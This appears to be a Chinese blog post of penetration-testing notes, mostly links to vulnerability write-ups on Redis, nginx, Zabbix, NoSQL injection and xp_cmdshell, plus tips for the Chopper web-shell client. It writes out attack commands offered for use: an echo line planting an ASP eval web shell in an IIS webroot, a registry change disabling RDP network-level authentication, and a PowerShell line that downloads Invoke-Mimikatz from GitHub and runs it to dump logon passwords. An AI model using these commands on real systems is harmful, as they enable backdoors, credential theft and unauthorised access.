不错的漏洞

http://www.secpulse.com/archives/3537.html

http://www.secpulse.com/archives/2225.html

http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/

http://drops.wooyun.org/papers/2466

菜刀技巧:

有两种方法可以设置指定的cmd路径,一就是在cmd操作界面,输入setp d:\cmd.exe,就可以了,或者把cmd.exe上传到目录,然后点右键,点virtual terminal file,就可以进入自定义CMD.EXE路径的命令行了


写木马技巧

echo ^<^%execute^(request^("eval"^)^)^%^>  c:\inetpub\wwwroot\cms\test123456.asp

内网渗透:

http://www.freebuf.com/articles/system/8499.html


nginx解析漏洞

http://drops.wooyun.org/tips/2006

http://segmentfault.com/q/1010000002927290

http://www.jb51.net/article/74629.htm


zabbix漏洞:


http://www.wooyun.org/bugs/wooyun-2013-023089
http://wooyun.org/bugs/wooyun-2010-0149599


nosql注入:

http://www.freebuf.com/articles/database/95314.html


hydra爆破3389:

http://www.cnblogs.com/hkleak/p/5169079.html


sql server的xp_cmdshell

http://www.freebuf.com/articles/web/55577.html



linux 的rdesktop连接win出现 Failed to connect, CredSSP required by server 解决方式:

在win上执行:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

就好了



powershell 的mimikatz


powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –command sekurlsa::logonpasswords

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值